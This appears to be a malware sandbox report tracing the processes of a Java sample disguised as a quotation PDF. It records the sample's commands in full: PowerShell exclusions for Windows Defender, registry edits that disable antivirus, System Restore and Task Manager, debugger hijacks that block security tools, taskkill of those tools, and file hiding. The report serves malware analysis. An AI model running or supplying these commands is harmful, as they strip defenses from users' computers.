PID 3780 wrote to memory of 4812	3780	java.exe	317
PID 4812 wrote to memory of 4864	4812	cmd.exe	319
PID 4812 wrote to memory of 4864	4812	cmd.exe	319
PID 4812 wrote to memory of 4884	4812	cmd.exe	320
PID 4812 wrote to memory of 4884	4812	cmd.exe	320
PID 3780 wrote to memory of 4928	3780	java.exe	321
PID 3780 wrote to memory of 4928	3780	java.exe	321
PID 4928 wrote to memory of 5028	4928	cmd.exe	323
PID 4928 wrote to memory of 5028	4928	cmd.exe	323
PID 4928 wrote to memory of 4896	4928	cmd.exe	324
PID 4928 wrote to memory of 4896	4928	cmd.exe	324
PID 3780 wrote to memory of 4892	3780	java.exe	325
PID 3780 wrote to memory of 4892	3780	java.exe	325
PID 4892 wrote to memory of 5072	4892	cmd.exe	327
PID 4892 wrote to memory of 5072	4892	cmd.exe	327
PID 4892 wrote to memory of 5092	4892	cmd.exe	328
PID 4892 wrote to memory of 5092	4892	cmd.exe	328
PID 3780 wrote to memory of 2612	3780	java.exe	329
PID 3780 wrote to memory of 2612	3780	java.exe	329
PID 2612 wrote to memory of 4120	2612	cmd.exe	331
PID 2612 wrote to memory of 4120	2612	cmd.exe	331
PID 2612 wrote to memory of 4196	2612	cmd.exe	332
PID 2612 wrote to memory of 4196	2612	cmd.exe	332
PID 3780 wrote to memory of 2444	3780	java.exe	333
PID 3780 wrote to memory of 2444	3780	java.exe	333
PID 2444 wrote to memory of 4324	2444	cmd.exe	335
PID 2444 wrote to memory of 4324	2444	cmd.exe	335
PID 2444 wrote to memory of 4392	2444	cmd.exe	336
PID 2444 wrote to memory of 4392	2444	cmd.exe	336
PID 3780 wrote to memory of 2396	3780	java.exe	337
PID 3780 wrote to memory of 2396	3780	java.exe	337
PID 2396 wrote to memory of 4356	2396	cmd.exe	339
PID 2396 wrote to memory of 4356	2396	cmd.exe	339
PID 2396 wrote to memory of 4348	2396	cmd.exe	340
PID 2396 wrote to memory of 4348	2396	cmd.exe	340
PID 3780 wrote to memory of 4420	3780	java.exe	341
PID 3780 wrote to memory of 4420	3780	java.exe	341
PID 4420 wrote to memory of 4528	4420	cmd.exe	343
PID 4420 wrote to memory of 4528	4420	cmd.exe	343
PID 4420 wrote to memory of 4552	4420	cmd.exe	344
PID 4420 wrote to memory of 4552	4420	cmd.exe	344
PID 3780 wrote to memory of 4636	3780	java.exe	345
PID 3780 wrote to memory of 4636	3780	java.exe	345
PID 4636 wrote to memory of 4548	4636	cmd.exe	347
PID 4636 wrote to memory of 4548	4636	cmd.exe	347
PID 4636 wrote to memory of 4712	4636	cmd.exe	348
PID 4636 wrote to memory of 4712	4636	cmd.exe	348
PID 3780 wrote to memory of 4736	3780	java.exe	349
PID 3780 wrote to memory of 4736	3780	java.exe	349
PID 3780 wrote to memory of 4860	3780	java.exe	351
PID 3780 wrote to memory of 4860	3780	java.exe	351
PID 4736 wrote to memory of 4880	4736	cmd.exe	352
PID 4736 wrote to memory of 4880	4736	cmd.exe	352
PID 4736 wrote to memory of 4988	4736	cmd.exe	354
PID 4736 wrote to memory of 4988	4736	cmd.exe	354
PID 3780 wrote to memory of 5096	3780	java.exe	355
PID 3780 wrote to memory of 5096	3780	java.exe	355
PID 5096 wrote to memory of 4160	5096	cmd.exe	357
PID 5096 wrote to memory of 4160	5096	cmd.exe	357
PID 5096 wrote to memory of 4220	5096	cmd.exe	358
PID 5096 wrote to memory of 4220	5096	cmd.exe	358
PID 3780 wrote to memory of 4228	3780	java.exe	359
PID 3780 wrote to memory of 4228	3780	java.exe	359
PID 4228 wrote to memory of 4372	4228	cmd.exe	361
PID 4228 wrote to memory of 4372	4228	cmd.exe	361
PID 4228 wrote to memory of 804	4228	cmd.exe	362
PID 4228 wrote to memory of 804	4228	cmd.exe	362
PID 3780 wrote to memory of 2384	3780	java.exe	363
PID 3780 wrote to memory of 2384	3780	java.exe	363
PID 2384 wrote to memory of 4576	2384	cmd.exe	365
PID 2384 wrote to memory of 4576	2384	cmd.exe	365
PID 2384 wrote to memory of 4592	2384	cmd.exe	366
PID 2384 wrote to memory of 4592	2384	cmd.exe	366
PID 3780 wrote to memory of 4668	3780	java.exe	367
PID 3780 wrote to memory of 4668	3780	java.exe	367
PID 4668 wrote to memory of 4732	4668	cmd.exe	369
PID 4668 wrote to memory of 4732	4668	cmd.exe	369
PID 4668 wrote to memory of 4912	4668	cmd.exe	370
PID 4668 wrote to memory of 4912	4668	cmd.exe	370
PID 3780 wrote to memory of 4880	3780	java.exe	371
PID 3780 wrote to memory of 4880	3780	java.exe	371
PID 3780 wrote to memory of 4972	3780	java.exe	373
PID 3780 wrote to memory of 4972	3780	java.exe	373
PID 3780 wrote to memory of 4312	3780	java.exe	375
PID 3780 wrote to memory of 4312	3780	java.exe	375
PID 3780 wrote to memory of 4640	3780	java.exe	377
PID 3780 wrote to memory of 4640	3780	java.exe	377
PID 3780 wrote to memory of 4864	3780	java.exe	379
PID 3780 wrote to memory of 4864	3780	java.exe	379
PID 3780 wrote to memory of 2620	3780	java.exe	381
PID 3780 wrote to memory of 2620	3780	java.exe	381
PID 3780 wrote to memory of 4932	3780	java.exe	383
PID 3780 wrote to memory of 4932	3780	java.exe	383
PID 3780 wrote to memory of 4372	3780	java.exe	385
PID 3780 wrote to memory of 4372	3780	java.exe	385
PID 3780 wrote to memory of 4596	3780	java.exe	387
PID 3780 wrote to memory of 4596	3780	java.exe	387

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1740	attrib.exe
804	attrib.exe
3844	attrib.exe
1152	attrib.exe
1212	attrib.exe
1284	attrib.exe
1420	attrib.exe
1540	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Techno Group Pakistan Request For Quotation_pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3780
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:416
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:640
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:804
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3844
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1152
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1212
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1284
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1420
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1540
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:412
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3140
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:2660
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3612
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3228
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3964
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1252
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:1288
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1312
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3680
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2532
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:3664
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1308
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:804
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:2480
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1768
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:648
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1312
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1744
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3524
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:2052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3640
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2552
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2396
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1772
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2452
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1552
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1448
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2116
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:2552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:3228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3356
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:3700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:3844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:508
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:3884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:2552
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:740
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1148
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2768
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1536
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:3700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:3700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4212
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4288
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4440
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4712
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4732
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4824
